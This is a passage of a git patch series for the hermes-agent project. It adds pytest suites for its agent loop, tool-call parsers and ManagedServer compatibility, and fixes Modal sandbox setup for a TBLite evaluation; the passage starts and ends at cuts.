  between hermes-agent and atroposlib's ManagedServer tool_call_parser support
  (gracefully skips on baseline atroposlib, passes on tool_call_support branch)
---
 tests/test_agent_loop.py                  | 483 ++++++++++++++++++++++
 tests/test_managed_server_tool_support.py | 173 ++++++++
 tests/test_tool_call_parsers.py           | 156 +++++++
 3 files changed, 812 insertions(+)
 create mode 100644 tests/test_agent_loop.py
 create mode 100644 tests/test_managed_server_tool_support.py
 create mode 100644 tests/test_tool_call_parsers.py

diff --git a/tests/test_agent_loop.py b/tests/test_agent_loop.py
new file mode 100644
index 00000000..22629b88
--- /dev/null
+++ b/tests/test_agent_loop.py
@@ -0,0 +1,483 @@
+"""
+Tests for environments/agent_loop.py — HermesAgentLoop.
+
+Tests the multi-turn agent engine using mocked servers, without needing
+real API keys or running servers.
+"""
+
+import asyncio
+import json
+import sys
+from dataclasses import dataclass
+from pathlib import Path
+from typing import Any, Dict, List, Optional
+from unittest.mock import MagicMock
+
+import pytest
+
+# Ensure repo root is importable
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from environments.agent_loop import (
+    AgentResult,
+    HermesAgentLoop,
+    ToolError,
+    _extract_reasoning_from_message,
+    resize_tool_pool,
+)
+
+
+# ─── Mock server infrastructure ─────────────────────────────────────────
+
+
+@dataclass
+class MockFunction:
+    name: str
+    arguments: str
+
+
+@dataclass
+class MockToolCall:
+    id: str
+    function: MockFunction
+    type: str = "function"
+
+
+@dataclass
+class MockMessage:
+    content: Optional[str]
+    role: str = "assistant"
+    tool_calls: Optional[List[MockToolCall]] = None
+    reasoning_content: Optional[str] = None
+    reasoning: Optional[str] = None
+    reasoning_details: Optional[list] = None
+
+
+@dataclass
+class MockChoice:
+    message: MockMessage
+    finish_reason: str = "stop"
+    index: int = 0
+
+
+@dataclass
+class MockChatCompletion:
+    choices: List[MockChoice]
+    id: str = "chatcmpl-mock"
+    model: str = "mock-model"
+
+
+class MockServer:
+    """
+    Mock server that returns pre-configured responses in sequence.
+    Mimics the chat_completion() interface.
+    """
+
+    def __init__(self, responses: List[MockChatCompletion]):
+        self.responses = responses
+        self.call_count = 0
+        self.call_history: List[Dict[str, Any]] = []
+
+    async def chat_completion(self, **kwargs) -> MockChatCompletion:
+        self.call_history.append(kwargs)
+        if self.call_count >= len(self.responses):
+            # Return a simple text response if we run out
+            return MockChatCompletion(
+                choices=[MockChoice(message=MockMessage(content="Done."))]
+            )
+        resp = self.responses[self.call_count]
+        self.call_count += 1
+        return resp
+
+
+def make_text_response(content: str) -> MockChatCompletion:
+    """Create a simple text-only response (no tool calls)."""
+    return MockChatCompletion(
+        choices=[MockChoice(message=MockMessage(content=content))]
+    )
+
+
+def make_tool_response(
+    tool_name: str,
+    arguments: dict,
+    content: str = "",
+    tool_call_id: str = "call_001",
+) -> MockChatCompletion:
+    """Create a response with a single tool call."""
+    return MockChatCompletion(
+        choices=[
+            MockChoice(
+                message=MockMessage(
+                    content=content,
+                    tool_calls=[
+                        MockToolCall(
+                            id=tool_call_id,
+                            function=MockFunction(
+                                name=tool_name,
+                                arguments=json.dumps(arguments),
+                            ),
+                        )
+                    ],
+                ),
+                finish_reason="tool_calls",
+            )
+        ]
+    )
+
+
+# ─── Tests ───────────────────────────────────────────────────────────────
+
+
+class TestAgentResult:
+    def test_defaults(self):
+        result = AgentResult(messages=[])
+        assert result.messages == []
+        assert result.managed_state is None
+        assert result.turns_used == 0
+        assert result.finished_naturally is False
+        assert result.reasoning_per_turn == []
+        assert result.tool_errors == []
+
+
+class TestExtractReasoning:
+    def test_reasoning_content_field(self):
+        msg = MockMessage(content="hello", reasoning_content="I think...")
+        assert _extract_reasoning_from_message(msg) == "I think..."
+
+    def test_reasoning_field(self):
+        msg = MockMessage(content="hello", reasoning="Let me consider...")
+        assert _extract_reasoning_from_message(msg) == "Let me consider..."
+
+    def test_reasoning_details(self):
+        detail = MagicMock()
+        detail.text = "Detail reasoning"
+        msg = MockMessage(content="hello", reasoning_details=[detail])
+        assert _extract_reasoning_from_message(msg) == "Detail reasoning"
+
+    def test_reasoning_details_dict_format(self):
+        msg = MockMessage(
+            content="hello",
+            reasoning_details=[{"text": "Dict reasoning"}],
+        )
+        assert _extract_reasoning_from_message(msg) == "Dict reasoning"
+
+    def test_no_reasoning(self):
+        msg = MockMessage(content="hello")
+        assert _extract_reasoning_from_message(msg) is None
+
+    def test_reasoning_content_takes_priority(self):
+        msg = MockMessage(
+            content="hello",
+            reasoning_content="First",
+            reasoning="Second",
+        )
+        assert _extract_reasoning_from_message(msg) == "First"
+
+
+class TestHermesAgentLoop:
+    """Test the agent loop with mock servers."""
+
+    @pytest.fixture
+    def basic_tools(self):
+        """Minimal tool schema for testing."""
+        return [
+            {
+                "type": "function",
+                "function": {
+                    "name": "terminal",
+                    "description": "Run a command",
+                    "parameters": {
+                        "type": "object",
+                        "properties": {
+                            "command": {
+                                "type": "string",
+                                "description": "Command to run",
+                            }
+                        },
+                        "required": ["command"],
+                    },
+                },
+            },
+            {
+                "type": "function",
+                "function": {
+                    "name": "read_file",
+                    "description": "Read a file",
+                    "parameters": {
+                        "type": "object",
+                        "properties": {
+                            "path": {"type": "string"},
+                        },
+                        "required": ["path"],
+                    },
+                },
+            },
+        ]
+
+    @pytest.fixture
+    def valid_names(self):
+        return {"terminal", "read_file", "todo"}
+
+    @pytest.mark.asyncio
+    async def test_simple_text_response(self, basic_tools, valid_names):
+        """Model responds with text only, no tool calls."""
+        server = MockServer([make_text_response("Hello! How can I help?")])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        result = await agent.run(messages)
+
+        assert result.finished_naturally is True
+        assert result.turns_used == 1
+        assert len(result.messages) >= 2  # user + assistant
+        assert result.messages[-1]["role"] == "assistant"
+        assert result.messages[-1]["content"] == "Hello! How can I help?"
+
+    @pytest.mark.asyncio
+    async def test_tool_call_then_text(self, basic_tools, valid_names):
+        """Model calls a tool, then responds with text."""
+        server = MockServer([
+            make_tool_response("todo", {"todos": [{"id": "1", "content": "test", "status": "pending"}]}),
+            make_text_response("I created a todo for you."),
+        ])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Create a todo"}]
+        result = await agent.run(messages)
+
+        assert result.finished_naturally is True
+        assert result.turns_used == 2
+        # Should have: user, assistant (tool_call), tool (result), assistant (text)
+        roles = [m["role"] for m in result.messages]
+        assert roles == ["user", "assistant", "tool", "assistant"]
+
+    @pytest.mark.asyncio
+    async def test_max_turns_reached(self, basic_tools, valid_names):
+        """Model keeps calling tools until max_turns is hit."""
+        # Create responses that always call a tool
+        responses = [
+            make_tool_response("todo", {"todos": [{"id": str(i), "content": f"task {i}", "status": "pending"}]}, tool_call_id=f"call_{i}")
+            for i in range(10)
+        ]
+        server = MockServer(responses)
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=3,
+        )
+        messages = [{"role": "user", "content": "Keep going"}]
+        result = await agent.run(messages)
+
+        assert result.finished_naturally is False
+        assert result.turns_used == 3
+
+    @pytest.mark.asyncio
+    async def test_unknown_tool_name(self, basic_tools, valid_names):
+        """Model calls a tool not in valid_tool_names."""
+        server = MockServer([
+            make_tool_response("nonexistent_tool", {"arg": "val"}),
+            make_text_response("OK, that didn't work."),
+        ])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Call something weird"}]
+        result = await agent.run(messages)
+
+        # Should record a tool error
+        assert len(result.tool_errors) >= 1
+        assert result.tool_errors[0].tool_name == "nonexistent_tool"
+
+    @pytest.mark.asyncio
+    async def test_empty_response(self, basic_tools, valid_names):
+        """Server returns empty response."""
+        server = MockServer([MockChatCompletion(choices=[])])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        result = await agent.run(messages)
+
+        assert result.finished_naturally is False
+        assert result.turns_used == 1
+
+    @pytest.mark.asyncio
+    async def test_api_error_handling(self, basic_tools, valid_names):
+        """Server raises an exception."""
+
+        class FailingServer:
+            async def chat_completion(self, **kwargs):
+                raise ConnectionError("Server unreachable")
+
+        agent = HermesAgentLoop(
+            server=FailingServer(),
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        result = await agent.run(messages)
+
+        assert result.finished_naturally is False
+        assert result.turns_used == 1
+
+    @pytest.mark.asyncio
+    async def test_tools_passed_to_server(self, basic_tools, valid_names):
+        """Verify tools are passed in the chat_completion kwargs."""
+        server = MockServer([make_text_response("OK")])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        await agent.run(messages)
+
+        assert len(server.call_history) == 1
+        assert "tools" in server.call_history[0]
+        assert server.call_history[0]["tools"] == basic_tools
+
+    @pytest.mark.asyncio
+    async def test_extra_body_forwarded(self, basic_tools, valid_names):
+        """extra_body should be forwarded to server."""
+        extra = {"provider": {"ignore": ["DeepInfra"]}}
+        server = MockServer([make_text_response("OK")])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+            extra_body=extra,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        await agent.run(messages)
+
+        assert server.call_history[0].get("extra_body") == extra
+
+    @pytest.mark.asyncio
+    async def test_managed_state_returned(self, basic_tools, valid_names):
+        """If server has get_state(), result should include managed_state."""
+        server = MockServer([make_text_response("OK")])
+        server.get_state = lambda: {"nodes": [{"test": True}]}
+
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        result = await agent.run(messages)
+
+        assert result.managed_state is not None
+        assert "nodes" in result.managed_state
+
+    @pytest.mark.asyncio
+    async def test_no_managed_state_without_get_state(self, basic_tools, valid_names):
+        """Regular server without get_state() should return None managed_state."""
+        server = MockServer([make_text_response("OK")])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Hi"}]
+        result = await agent.run(messages)
+
+        assert result.managed_state is None
+
+    @pytest.mark.asyncio
+    async def test_memory_tool_blocked(self, basic_tools):
+        """Memory tool should return error in RL environments."""
+        valid = {"terminal", "read_file", "todo", "memory"}
+        server = MockServer([
+            make_tool_response("memory", {"action": "add", "target": "user", "content": "test"}),
+            make_text_response("Done"),
+        ])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Remember this"}]
+        result = await agent.run(messages)
+
+        # Find the tool response
+        tool_msgs = [m for m in result.messages if m["role"] == "tool"]
+        assert len(tool_msgs) >= 1
+        tool_result = json.loads(tool_msgs[0]["content"])
+        assert "error" in tool_result
+        assert "not available" in tool_result["error"].lower()
+
+    @pytest.mark.asyncio
+    async def test_session_search_blocked(self, basic_tools):
+        """session_search should return error in RL environments."""
+        valid = {"terminal", "read_file", "todo", "session_search"}
+        server = MockServer([
+            make_tool_response("session_search", {"query": "test"}),
+            make_text_response("Done"),
+        ])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "Search sessions"}]
+        result = await agent.run(messages)
+
+        tool_msgs = [m for m in result.messages if m["role"] == "tool"]
+        assert len(tool_msgs) >= 1
+        tool_result = json.loads(tool_msgs[0]["content"])
+        assert "error" in tool_result
+
+    @pytest.mark.asyncio
+    async def test_reasoning_content_preserved(self, basic_tools, valid_names):
+        """Reasoning content should be extracted and preserved."""
+        resp = MockChatCompletion(
+            choices=[
+                MockChoice(
+                    message=MockMessage(
+                        content="The answer is 42.",
+                        reasoning_content="Let me think about this step by step...",
+                    )
+                )
+            ]
+        )
+        server = MockServer([resp])
+        agent = HermesAgentLoop(
+            server=server,
+            tool_schemas=basic_tools,
+            valid_tool_names=valid_names,
+            max_turns=10,
+        )
+        messages = [{"role": "user", "content": "What is the meaning of life?"}]
+        result = await agent.run(messages)
+
+        assert len(result.reasoning_per_turn) == 1
+        assert result.reasoning_per_turn[0] == "Let me think about this step by step..."
+
+
+class TestResizeToolPool:
+    def test_resize_works(self):
+        """resize_tool_pool should not raise."""
+        resize_tool_pool(16)  # Small pool for testing
+        resize_tool_pool(128)  # Restore default
diff --git a/tests/test_managed_server_tool_support.py b/tests/test_managed_server_tool_support.py
new file mode 100644
index 00000000..00b0e94f
--- /dev/null
+++ b/tests/test_managed_server_tool_support.py
@@ -0,0 +1,173 @@
+"""
+Tests for ManagedServer tool_call_parser integration.
+
+Validates that:
+1. ManagedServer accepts tool_call_parser parameter (tool_call_support branch)
+2. ServerManager.managed_server() passes tool_call_parser through
+3. The parser's parse() output is correctly attached to ChatCompletion responses
+4. hermes-agent's tool_call_parsers are compatible with ManagedServer's expectations
+
+These tests verify the contract between hermes-agent's environments/ code
+and atroposlib's ManagedServer. They detect API incompatibilities early.
+"""
+
+import inspect
+import sys
+from pathlib import Path
+
+import pytest
+
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+
+class TestManagedServerAPI:
+    """Test that ManagedServer's API matches what hermes-agent expects."""
+
+    def test_managed_server_init_signature(self):
+        """ManagedServer should accept tool_call_parser parameter."""
+        from atroposlib.envs.server_handling.managed_server import ManagedServer
+
+        sig = inspect.signature(ManagedServer.__init__)
+        params = list(sig.parameters.keys())
+
+        # Core params that must exist
+        assert "self" in params
+        assert "server" in params
+        assert "tokenizer" in params
+        assert "track_tree" in params
+
+        # tool_call_parser — required for tool_call_support branch
+        # If this fails, atroposlib hasn't been updated to tool_call_support
+        has_tool_parser = "tool_call_parser" in params
+        if not has_tool_parser:
+            pytest.skip(
+                "ManagedServer does not have tool_call_parser param — "
+                "baseline atroposlib (pre tool_call_support branch)"
+            )
+
+    def test_server_manager_managed_server_signature(self):
+        """ServerManager.managed_server() should accept tool_call_parser."""
+        from atroposlib.envs.server_handling.server_manager import ServerManager
+
+        sig = inspect.signature(ServerManager.managed_server)
+        params = list(sig.parameters.keys())
+
+        assert "self" in params
+        assert "tokenizer" in params
+
+        has_tool_parser = "tool_call_parser" in params
+        if not has_tool_parser:
+            pytest.skip(
+                "ServerManager.managed_server() does not have tool_call_parser param — "
+                "baseline atroposlib (pre tool_call_support branch)"
+            )
+
+    def test_managed_server_chat_template_kwargs(self):
+        """ManagedServer should have CHAT_TEMPLATE_KWARGS for forwarding tools/thinking."""
+        from atroposlib.envs.server_handling.managed_server import ManagedServer
+
+        if not hasattr(ManagedServer, "CHAT_TEMPLATE_KWARGS"):
+            pytest.skip(
+                "ManagedServer does not have CHAT_TEMPLATE_KWARGS — "
+                "baseline atroposlib (pre tool_call_support branch)"
+            )
+
+        kwargs = ManagedServer.CHAT_TEMPLATE_KWARGS
+        assert "tools" in kwargs, "tools must be in CHAT_TEMPLATE_KWARGS"
+
+    def test_no_get_logprobs_method(self):
+        """get_logprobs should be removed in tool_call_support branch."""
+        from atroposlib.envs.server_handling.managed_server import ManagedServer
+
+        # In baseline, get_logprobs exists. In tool_call_support, it's removed.
+        # We just note the state — not a hard fail either way.
+        has_get_logprobs = hasattr(ManagedServer, "get_logprobs")
+        if has_get_logprobs:
+            pytest.skip(
+                "ManagedServer still has get_logprobs — baseline atroposlib"
+            )
+
+
+class TestParserCompatibility:
+    """Test that hermes-agent's parsers match ManagedServer's expectations."""
+
+    def test_parser_parse_returns_correct_format(self):
+        """
+        ManagedServer expects parser.parse(text) -> (content, tool_calls)
+        where tool_calls is a list of objects with .id, .function.name, .function.arguments
+        """
+        from environments.tool_call_parsers import get_parser
+
+        parser = get_parser("hermes")
+        text = '<tool_call>{"name": "terminal", "arguments": {"command": "ls"}}</tool_call>'
+        content, tool_calls = parser.parse(text)
+
+        assert tool_calls is not None
+        assert len(tool_calls) == 1
+
+        tc = tool_calls[0]
+        # ManagedServer accesses these attrs directly
+        assert hasattr(tc, "id")
+        assert hasattr(tc, "function")
+        assert hasattr(tc.function, "name")
+        assert hasattr(tc.function, "arguments")
+
+    def test_parser_no_tools_returns_none(self):
+        """ManagedServer checks `if parsed_tool_calls:` — None should be falsy."""
+        from environments.tool_call_parsers import get_parser
+
+        parser = get_parser("hermes")
+        content, tool_calls = parser.parse("Just text, no tools")
+        assert tool_calls is None
+
+    def test_parser_content_is_string_or_none(self):
+        """ManagedServer uses `parsed_content or ""` — must be str or None."""
+        from environments.tool_call_parsers import get_parser
+
+        parser = get_parser("hermes")
+
+        # With tool calls
+        text = '<tool_call>{"name": "terminal", "arguments": {"command": "ls"}}</tool_call>'
+        content, _ = parser.parse(text)
+        assert content is None or isinstance(content, str)
+
+        # Without tool calls
+        content2, _ = parser.parse("Just text")
+        assert isinstance(content2, str)
+
+
+class TestBaseEnvCompatibility:
+    """Test that hermes_base_env.py's managed_server() call matches the API."""
+
+    def test_hermes_base_env_managed_server_call_pattern(self):
+        """
+        Verify that hermes_base_env.py passes tool_call_parser to managed_server().
+        This is a source-level check — the actual managed_server() call must match.
+        """
+        import ast
+
+        base_env_path = Path(__file__).parent.parent / "environments" / "hermes_base_env.py"
+        source = base_env_path.read_text()
+        tree = ast.parse(source)
+
+        # Find the managed_server() call
+        found_tool_call_parser_kwarg = False
+        for node in ast.walk(tree):
+            if isinstance(node, ast.Call):
+                # Look for self.server.managed_server(...)
+                if isinstance(node.func, ast.Attribute) and node.func.attr == "managed_server":
+                    for kw in node.keywords:
+                        if kw.arg == "tool_call_parser":
+                            found_tool_call_parser_kwarg = True
+
+        assert found_tool_call_parser_kwarg, (
+            "hermes_base_env.py should pass tool_call_parser= to managed_server()"
+        )
+
+    def test_hermes_base_env_uses_get_parser(self):
+        """Verify hermes_base_env imports and uses get_parser from tool_call_parsers."""
+        base_env_path = Path(__file__).parent.parent / "environments" / "hermes_base_env.py"
+        source = base_env_path.read_text()
+
+        assert "from environments.tool_call_parsers import get_parser" in source
+        assert "get_parser(" in source
diff --git a/tests/test_tool_call_parsers.py b/tests/test_tool_call_parsers.py
new file mode 100644
index 00000000..6a07a226
--- /dev/null
+++ b/tests/test_tool_call_parsers.py
@@ -0,0 +1,156 @@
+"""
+Tests for environments/tool_call_parsers/ — client-side tool call parsers.
+
+These parsers extract structured tool_calls from raw model output text.
+Used in Phase 2 (VLLM/generate) where the server returns raw tokens.
+"""
+
+import json
+import sys
+from pathlib import Path
+
+import pytest
+
+# Ensure repo root is importable
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from environments.tool_call_parsers import (
+    ParseResult,
+    ToolCallParser,
+    get_parser,
+    list_parsers,
+)
+
+
+# ─── Registry tests ─────────────────────────────────────────────────────
+
+class TestParserRegistry:
+    def test_list_parsers_returns_nonempty(self):
+        parsers = list_parsers()
+        assert len(parsers) > 0
+
+    def test_hermes_parser_registered(self):
+        parsers = list_parsers()
+        assert "hermes" in parsers
+
+    def test_get_parser_returns_instance(self):
+        parser = get_parser("hermes")
+        assert isinstance(parser, ToolCallParser)
+
+    def test_get_parser_unknown_raises(self):
+        with pytest.raises(KeyError):
+            get_parser("nonexistent_parser_xyz")
+
+    def test_all_registered_parsers_instantiate(self):
+        """Every registered parser should be importable and instantiable."""
+        for name in list_parsers():
+            parser = get_parser(name)
+            assert isinstance(parser, ToolCallParser)
+            assert hasattr(parser, "parse")
+
+
+# ─── Hermes parser tests ────────────────────────────────────────────────
+
+class TestHermesParser:
+    @pytest.fixture
+    def parser(self):
+        return get_parser("hermes")
+
+    def test_no_tool_call(self, parser):
+        text = "Hello, I can help you with that."
+        content, tool_calls = parser.parse(text)
+        assert content == text
+        assert tool_calls is None
+
+    def test_single_tool_call(self, parser):
+        text = '<tool_call>{"name": "terminal", "arguments": {"command": "ls -la"}}</tool_call>'
+        content, tool_calls = parser.parse(text)
+        assert tool_calls is not None
+        assert len(tool_calls) == 1
+        assert tool_calls[0].function.name == "terminal"
+        args = json.loads(tool_calls[0].function.arguments)
+        assert args["command"] == "ls -la"
+
+    def test_tool_call_with_surrounding_text(self, parser):
+        text = 'Let me check that for you.\n<tool_call>{"name": "terminal", "arguments": {"command": "pwd"}}</tool_call>'
+        content, tool_calls = parser.parse(text)
+        assert tool_calls is not None
+        assert len(tool_calls) == 1
+        assert tool_calls[0].function.name == "terminal"
+        # Content should have the surrounding text
+        if content is not None:
+            assert "check that" in content or content.strip() != ""
+
+    def test_multiple_tool_calls(self, parser):
+        text = (
+            '<tool_call>{"name": "terminal", "arguments": {"command": "ls"}}</tool_call>\n'
+            '<tool_call>{"name": "read_file", "arguments": {"path": "test.py"}}</tool_call>'
+        )
+        content, tool_calls = parser.parse(text)
+        assert tool_calls is not None
+        assert len(tool_calls) == 2
+        names = {tc.function.name for tc in tool_calls}
+        assert "terminal" in names
+        assert "read_file" in names
+
+    def test_tool_call_ids_are_unique(self, parser):
+        text = (
+            '<tool_call>{"name": "terminal", "arguments": {"command": "ls"}}</tool_call>\n'
+            '<tool_call>{"name": "terminal", "arguments": {"command": "pwd"}}</tool_call>'
+        )
+        _, tool_calls = parser.parse(text)
+        assert tool_calls is not None
+        ids = [tc.id for tc in tool_calls]
+        assert len(ids) == len(set(ids)), "Tool call IDs must be unique"
+
+    def test_empty_string(self, parser):
+        content, tool_calls = parser.parse("")
+        assert tool_calls is None
+
+    def test_malformed_json_in_tool_call(self, parser):
+        text = '<tool_call>not valid json</tool_call>'
+        content, tool_calls = parser.parse(text)
+        # Should either return None tool_calls or handle gracefully
+        # (implementation may vary — some parsers return error tool calls)
+
+    def test_truncated_tool_call(self, parser):
+        """Test handling of unclosed tool_call tag (model truncated mid-generation)."""
+        text = '<tool_call>{"name": "terminal", "arguments": {"command": "ls -la"}'
+        content, tool_calls = parser.parse(text)
+        # Parser should handle truncated output gracefully
+        # Either parse it successfully or return None
+
+
+# ─── Parse result contract tests (applies to ALL parsers) ───────────────
+
+class TestParseResultContract:
+    """Ensure all parsers conform to the ParseResult contract."""
+
+    @pytest.fixture(params=["hermes"])  # Add more as needed
+    def parser(self, request):
+        return get_parser(request.param)
+
+    def test_returns_tuple_of_two(self, parser):
+        result = parser.parse("hello world")
+        assert isinstance(result, tuple)
+        assert len(result) == 2
+
+    def test_no_tools_returns_none_tool_calls(self, parser):
+        content, tool_calls = parser.parse("Just plain text, no tools.")
+        assert tool_calls is None
+        assert content is not None
+
+    def test_tool_calls_are_proper_objects(self, parser):
+        """When tool calls are found, they should be ChatCompletionMessageToolCall objects."""
+        # Use hermes format since that's universal
+        text = '<tool_call>{"name": "terminal", "arguments": {"command": "echo hi"}}</tool_call>'
+        content, tool_calls = parser.parse(text)
+        if tool_calls is not None:
+            for tc in tool_calls:
+                assert hasattr(tc, "id")
+                assert hasattr(tc, "function")
+                assert hasattr(tc.function, "name")
+                assert hasattr(tc.function, "arguments")
+                assert tc.id is not None
+                assert isinstance(tc.function.name, str)
+                assert isinstance(tc.function.arguments, str)

From d7f4db53f585569c8d9f20f7fe622d6ecce39bdc Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 18:36:28 -0500
Subject: [PATCH 076/105] fix: Modal sandbox eval infra (9 fixes for TBLite
 baseline)

Fixes discovered while running TBLite baseline evaluation:

1. ephemeral_disk param not supported in modal 1.3.5 - check before passing
2. Modal legacy image builder requires working pip - add ensurepip fix via
   setup_dockerfile_commands to handle task images with broken pip
3. Host cwd leaked into Modal sandbox - add /home/ to host prefix check
4. Tilde ~ not expanded by subprocess.run(cwd=) in sandboxes - use /root
5. install_pipx must stay True for swerex-remote to be available

Dependencies also needed (not in this commit):
- git submodule update --init mini-swe-agent
- uv pip install swe-rex boto3
---
 environments/patches.py     | 18 +++++++++++++++++-
 tools/environments/modal.py |  3 ++-
 tools/terminal_tool.py      |  9 +++++++--
 3 files changed, 26 insertions(+), 4 deletions(-)

diff --git a/environments/patches.py b/environments/patches.py
index f6cfaeb4..3c5ed2cd 100644
--- a/environments/patches.py
+++ b/environments/patches.py
@@ -114,11 +114,27 @@ def _patch_swerex_modal():
         self._worker = _AsyncWorker()
         self._worker.start()
 
+        # Pre-build a modal.Image with pip fix for Modal's legacy image builder.
+        # Modal requires `python -m pip` to work during image build, but some
+        # task images (e.g., TBLite's broken-python) have intentionally broken pip.
+        # Fix: remove stale pip dist-info and reinstall via ensurepip before Modal
+        # tries to use it. This is a no-op for images where pip already works.
+        import modal as _modal
+        image_spec = self.config.image
+        if isinstance(image_spec, str):
+            image_spec = _modal.Image.from_registry(
+                image_spec,
+                setup_dockerfile_commands=[
+                    "RUN rm -rf /usr/local/lib/python*/site-packages/pip* 2>/dev/null; "
+                    "python -m ensurepip --upgrade --default-pip 2>/dev/null || true",
+                ],
+            )
+
         # Create AND start the deployment entirely on the worker's loop/thread
         # so all gRPC channels and async state are bound to that loop
         async def _create_and_start():
             deployment = ModalDeployment(
-                image=self.config.image,
+                image=image_spec,
                 startup_timeout=self.config.startup_timeout,
                 runtime_timeout=self.config.runtime_timeout,
                 deployment_timeout=self.config.deployment_timeout,
diff --git a/tools/environments/modal.py b/tools/environments/modal.py
index dbdd0a7c..44ad51eb 100644
--- a/tools/environments/modal.py
+++ b/tools/environments/modal.py
@@ -50,7 +50,7 @@ class ModalEnvironment(BaseEnvironment):
     def __init__(
         self,
         image: str,
-        cwd: str = "~",
+        cwd: str = "/root",
         timeout: int = 60,
         modal_sandbox_kwargs: Optional[Dict[str, Any]] = None,
         persistent_filesystem: bool = True,
@@ -95,6 +95,7 @@ class ModalEnvironment(BaseEnvironment):
             startup_timeout=180.0,
             runtime_timeout=3600.0,
             modal_sandbox_kwargs=sandbox_kwargs,
+            install_pipx=True,  # Required: installs pipx + swe-rex runtime (swerex-remote)
         )
 
     def execute(self, command: str, cwd: str = "", *,
diff --git a/tools/terminal_tool.py b/tools/terminal_tool.py
index 18d1629e..d124dba9 100644
--- a/tools/terminal_tool.py
+++ b/tools/terminal_tool.py
@@ -463,7 +463,7 @@ def _get_env_config() -> Dict[str, Any]:
     if env_type == "local":
         default_cwd = os.getcwd()
     else:
-        default_cwd = "~"
+        default_cwd = "/root"
     
     # Read TERMINAL_CWD but sanity-check it for container backends.
     # If the CWD looks like a host-local path that can't exist inside a
@@ -553,7 +553,12 @@ def _create_environment(env_type: str, image: str, cwd: str, timeout: int,
         if memory > 0:
             sandbox_kwargs["memory"] = memory
         if disk > 0:
-            sandbox_kwargs["ephemeral_disk"] = disk
+            try:
+                import inspect, modal
+                if "ephemeral_disk" in inspect.signature(modal.Sandbox.create).parameters:
+                    sandbox_kwargs["ephemeral_disk"] = disk
+            except Exception:
+                pass
         
         return _ModalEnvironment(
             image=image, cwd=cwd, timeout=timeout,

From b03aefaf20fcb3d1a174e5e713de08a31ce036d4 Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 20:26:09 -0500
Subject: [PATCH 077/105] test: 13 tests for Modal sandbox infra fixes

---
 tests/tools/test_modal_sandbox_fixes.py | 257 ++++++++++++++++++++++++
 1 file changed, 257 insertions(+)
 create mode 100644 tests/tools/test_modal_sandbox_fixes.py

diff --git a/tests/tools/test_modal_sandbox_fixes.py b/tests/tools/test_modal_sandbox_fixes.py
new file mode 100644
index 00000000..49437a8d
--- /dev/null
+++ b/tests/tools/test_modal_sandbox_fixes.py
@@ -0,0 +1,257 @@
+"""Tests for Modal sandbox infrastructure fixes (TBLite baseline).
+
+Covers the 9 bugs discovered while setting up TBLite evaluation:
+1. Tool resolution — terminal + file tools load with minisweagent
+2. CWD fix — host paths get replaced with /root for container backends
+3. ephemeral_disk version check
+4. Tilde ~ replaced with /root for container backends
+5. ensurepip fix in patches.py for Modal image builder
+6. install_pipx stays True for swerex-remote
+7. /home/ added to host prefix check
+"""
+
+import os
+import sys
+from pathlib import Path
+from unittest.mock import patch, MagicMock
+
+import pytest
+
+# Ensure repo root is importable
+_repo_root = Path(__file__).resolve().parent.parent.parent
+if str(_repo_root) not in sys.path:
+    sys.path.insert(0, str(_repo_root))
+
+import tools.terminal_tool  # noqa: F401
+_tt_mod = sys.modules["tools.terminal_tool"]
+
+
+# =========================================================================
+# Test 1: Tool resolution includes terminal + file tools
+# =========================================================================
+
+class TestToolResolution:
+    """Verify get_tool_definitions returns all expected tools for eval."""
+
+    def test_terminal_and_file_toolsets_resolve_all_tools(self):
+        """enabled_toolsets=['terminal', 'file'] should produce 6 tools."""
+        from model_tools import get_tool_definitions
+        tools = get_tool_definitions(
+            enabled_toolsets=["terminal", "file"],
+            quiet_mode=True,
+        )
+        names = {t["function"]["name"] for t in tools}
+        expected = {"terminal", "process", "read_file", "write_file", "search_files", "patch"}
+        assert expected == names, f"Expected {expected}, got {names}"
+
+    def test_terminal_tool_present(self):
+        """The terminal tool must be present (not silently dropped)."""
+        from model_tools import get_tool_definitions
+        tools = get_tool_definitions(
+            enabled_toolsets=["terminal", "file"],
+            quiet_mode=True,
+        )
+        names = [t["function"]["name"] for t in tools]
+        assert "terminal" in names, (
